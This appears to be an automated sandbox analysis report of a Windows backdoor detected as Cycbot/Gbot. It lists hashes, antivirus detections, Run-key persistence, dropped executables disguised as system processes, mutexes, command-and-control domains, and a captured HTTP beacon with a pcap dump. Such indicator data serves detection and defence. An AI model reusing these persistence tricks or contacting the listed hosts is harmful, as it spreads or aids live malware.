Analysis Date: 2014-11-22 16:27:01
MD5: 1b385249a81828d762c778c477cc616c
SHA1: a183990bc8ee8ef558f43347b6e8424ed3b3faf9

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section .text: md5: 97b1acd734fa777ef527a201e0d4c878 sha1: cb44c4beb0365d2bf51c0135e396b606d9accf47 size: 96768
Section .rdata: md5: 896afadb98774e40c47e4b30d77ee868 sha1: 186fec75446e2b1c8b0dab57de26445d2ad62ef8 size: 2048
Section .data: md5: 999bde1aabd3a862a98f3dff011e74d7 sha1: 392c90a9fa12375328162307b3e3bff1f94f3efa size: 57344
Section .isete: md5: c626f8cdc2fa09f4754858dc28c86e08 sha1: abcbaa5934dcb99b5b4f1c4b389dbf6236cfa468 size: 1024
Timestamp: 2005-11-14 08:50:38
Version:
  ProductVersion: 1.0.0.3
  FileVersion: 1.0.0.3
  PrivateBuild: 1532
PEhash: d9638a5e7e6f8519d2cf3ee02b8d2a68409c91d7
IMPhash: 598e6bc96006455052474510d3f6220a
AV 360 Safe: Backdoor.Bot.137163
AV Ad-Aware: Backdoor.Bot.137163
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.G.gen!Eldorado
AV Avira (antivir): BDS/Gbot.aida
AV BullGuard: Backdoor.Bot.137163
AV CA (E-Trust Ino): Win32/Diple.A!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-316
AV Dr. Web: BackDoor.Gbot.21
AV Emsisoft: Backdoor.Bot.137163
AV Eset (nod32): Win32/Kryptik.LZI
AV Fortinet: W32/FraudLoad.MK!tr
AV Frisk (f-prot): W32/Goolbot.G.gen!Eldorado
AV F-Secure: Backdoor.Bot.137163
AV Grisoft (avg): Cryptic.CMZ
AV Ikarus: Backdoor.Win32.Gbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.aid
AV MalwareBytes: Trojan.Agent
AV Mcafee: BackDoor-EXI.gen.i
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Backdoor.Bot.137163
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen3
AV Trend Micro: BKDR_CYCBOT.SMX
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: bigmusicarchive.com
Winsock DNS: 127.0.0.1
Winsock DNS: nationsautoelectric.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS: nationsautoelectric.com
Type: A
98.139.135.198
DNS: bigmusicarchive.com
Type: A
HTTP GET: http://nationsautoelectric.com/images/50-217-1_F_2_.jpg?v61=87&tq=gHZutDyMv5rJejDia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 98.139.135.198:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 35302d32   GET /images/50-2
0x00000010 (00016)   31372d31 5f465f32 5f2e6a70 673f7636   17-1_F_2_.jpg?v6
0x00000020 (00032)   313d3837 2674713d 67485a75 7444794d   1=87&tq=gHZutDyM
0x00000030 (00048)   7635724a 656a4469 61396e72 6d736c36   v5rJejDia9nrmsl6
0x00000040 (00064)   6769577a 2532424a 5a625679 41253344   giWz%2BJZbVyA%3D
0x00000050 (00080)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000060 (00096)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000070 (00112)   73743a20 6e617469 6f6e7361 75746f65   st: nationsautoe
0x00000080 (00128)   6c656374 7269632e 636f6d0d 0a416363   lectric.com..Acc
0x00000090 (00144)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000a0 (00160)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x000000b0 (00176)   300d0a0d 0a                           0....


Strings
.
.
P...u
.
..6
...$
1..$y.L.I.
P.c
..im
.rB
o
....
<
E/,C....#w...;.,....
..<F...zsP
B.......l...
040904b0
1.0.0.3
1532
CAF&
FileVersion
jjjjjj
PQs""
PrivateBuild
ProductVersion
%R0a
&Rsf
$%S$
s&@$dp
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
1=0\Dq
\1Ana=dI
1#gx7|
:2<=yE(
3\>j[E
>4Qr]ZT`Q
4wfT"=
/4&=x,
&5vAT;
{6CG0/
-6u+8y
77?hy%
7)F!	t
7g-<t9
7h" 6*h
&#\7]U
8P\?HE
A`3I+;
;AaFd;
AdHHvM
ADVAPI32.dll
aewCC!
<A.KR,
a_q	{b
A^v]}G
b$G(T.
BvR?im
CharNextW
CharUpperW
cJO|!U
CoCreateInstance
CoInitialize
CoRegisterClassObject
CoRevokeClassObject
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
CoUninitialize
CreateFileMappingW
CreateStdAccessibleObject
d4z	=-T%
@.data
DispatchMessageW
+dNQz#{`
dQf@47
E6gte!O-D
	ED\CS0
;>ekC7
+E!"n3_
EnumResourceNamesA
es?G	"
f7vg:Q
FillConsoleOutputCharacterA
FindClose
FreeEnvironmentStringsW
fwhY,e
Fy,d#+k
fZJ&&t^
-G!96T.&
GetACP
GetCPInfo
GetLastError
GetMessageW
GetModuleHandleW
GetProcessWorkingSetSize
GetTickCount
 Gf8<}
GlobalAlloc
GlobalFree
GXZZCJ
h3(gR-
H5d]4;n_T
H8Hw'iP
ha3}Gc*
%<i![+
_I5S~V
^IAI|4
I[(bB@
i*B<w|
Ik [WE
iKYiYI,
InitializeCriticalSection
I:O6l	2
.isete
|I	=t3
iXrApi
 >	 J1
[.jBu<
j.Lj7V	8
/jNl)<
jVx([.}r
j)Ya8]
;K*[8nK=4
KClAl<
KERNEL32.dll
KillTimer
kJHHws
^Kjswdy
k?li[N
K}%ovg	[
kVIO<#
*:_kw]
Kw`VHC-_2
<K.z'RX)
#	L5U0
l>Hh5Z
LockResource
LresultFromObject
lstrcmpiW
lstrcpyA
lstrcpyW
lstrlenW
LX$:(%
_mf5hi
MultiByteToWideChar
MX9wZ8q
:NBAv	_/WW
N`$<#kYSp
nMQ1h?
no-uBK
/N?.>)P
nu&,$`
nVyEM\
ole32.dll
OLEACC.dll
#*OrbTr
OutputDebugStringW
oV8.@}+uZ/
{p8~!3v
PathCombineW
PathFileExistsW
#_?pHR
PostThreadMessageW
"P=xbx
?]}]Q~
/!Q.ai
>qjD+}
+QP.Pz
r2C*/8j
`.rdata
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegDeleteValueW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegSetValueExW
rFy(9wvl{C
r* HEy
rJs&5n
^R*PKsLN`
r?r/F]
+rSih<%
}*+;^s
Sc`5h.
"sdy}@
SetTimer
SHLWAPI.dll
StringFromCLSID
StringFromGUID2
TF8&bO
!This program cannot be run in DOS mode.
TOYA?,
TranslateMessage
TscFoH
Tt3N&E
/u6d*q
uJ5k8tO
UnregisterClassA
uO5l(B
UpdateWindow
U}q*Eo
USER32.dll
v^w7W]
Vws] `T
w1p6@2r
W8{KANAR
Wc+BaN
WideCharToMultiByte
WJ{h1%
?wMT6s
<\W,N%
WO|-Ju
wsprintfW
~xfgMf
x[	ihj/
X,mvWVfE
?Y<9NH 
Yo_Hebf
Y:Oo	Q
y[s)PA`
@yWZa:
zJl&K`